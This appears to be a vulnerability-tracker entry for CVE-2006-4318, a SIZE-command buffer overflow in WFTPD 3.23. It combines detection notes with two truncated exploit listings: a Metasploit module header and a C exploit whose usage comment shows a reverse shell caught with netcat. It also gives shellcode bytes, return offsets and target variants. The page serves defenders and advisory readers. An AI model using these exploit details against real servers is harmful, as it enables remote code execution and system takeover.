CVE-2006-4318
Published 2006-08-24
Priority: P3 (53) · CVSS 2.0: 6.5 (medium)
Exploit available. EPSS: 62.32% (99.1th percentile)
Buffer overflow in WFTPD Server 3.23 allows remote attackers to execute arbitrary code via long SIZE commands.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| texas_imperial_software | wftpd | — | — |
Detection & IOCs (extracted from sources)
- bytes: `\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6\x10\x92\x98\x83\xeb\xfc\xe2\xf4`
- Alert on FTP SIZE command arguments exceeding normal filename length (e.g., >512 bytes) on port 21, indicative of buffer overflow exploitation of WFTPD 3.23.
- The exploit uses a reverse shell payload; monitor for unexpected outbound TCP connections from the WFTPD process (wftpd.exe) shortly after a SIZE command is received.
- The exploit payload bad characters are null byte, space, LF, and CR; NOP sleds and shellcode in SIZE arguments will avoid these bytes. Scan FTP SIZE arguments for high-entropy non-printable byte sequences.
- The exploit places the return address at buffer position 531 (opt=0, path='/') or 532 (opt=1, path='//') within the SIZE argument; look for SIZE arguments with NOP sleds starting at offset 7.
- The Metasploit module's payload space is limited to 500 bytes and a stack adjustment of -3500 is applied; exploits with different payload sizes or stack adjustments may not match the exact buffer layout described.
- Return addresses (JMP ESI gadgets) are OS/SP/language-specific; the exploit targets XP SP2 Polish, 2000 SP4 Polish, XP SP2 English, 2000 SP4 English, and XP SP2 German. Detection based on return address values must account for all variants.
- The exploit requires valid FTP credentials before sending the malicious SIZE command; unauthenticated detection at the network layer alone is insufficient, since the attacker must first successfully log in.
No detection rules found.
Exploit-DB · 2010-06-22: Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)
---
```ruby
##
# $Id: wftpd_size.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Standard Metasploit 3 remote exploit module; the class header and
# initialize() opener were stripped as an HTML tag in the indexed copy.
class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Texas Imperial Software WFTPD 3.23 SIZE Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the SIZE verb in
				Texas Imperial's Software WFTPD 3.23.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2006-4318' ],
					[ 'OSVDB', '28134' ],
					[ 'BID', '19617' ],
				],
			'Privileged'     => true,
			'DefaultOption
# (listing truncated in the indexed source)
```
Exploit-DB · 2006-08-21: Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
```c
/*
 * wftpd_exp.c
 * WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
 * coded by h07
 * tested on XP SP2 polish, 2000 SP4 polish
 * example..
 * C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
 * [*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
 * [*] coded by h07
 * [*] FTP response: 331 Give me your password, please
 * [*] FTP response: 230 Logged in successfully
 * [+] sending buffer: ok
 * [*] press enter to quit
 * C:\>nc -l -p 4444
 * Microsoft Windows XP [Wersja 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 * C:\wftpd323>
 */
/* header names were stripped as HTML tags in the indexed copy; the
   Win32 socket code of this exploit needs these two */
#include <stdio.h>
#include <winsock2.h>

#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
/* (listing truncated in the indexed source) */
```
Metasploit: Texas Imperial Software WFTPD 3.23 SIZE Overflow
This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23.
No writeups or analysis indexed.
References
- http://packetstormsecurity.org/0608-exploits/wftpd_exp.c
- http://secunia.com/advisories/21547
- http://securitytracker.com/id?1016723
- http://www.osvdb.org/28134
- http://www.securityfocus.com/bid/19617
- http://www.vupen.com/english/advisories/2006/3357
- https://exchange.xforce.ibmcloud.com/vulnerabilities/28523
- https://www.exploit-db.com/exploits/2233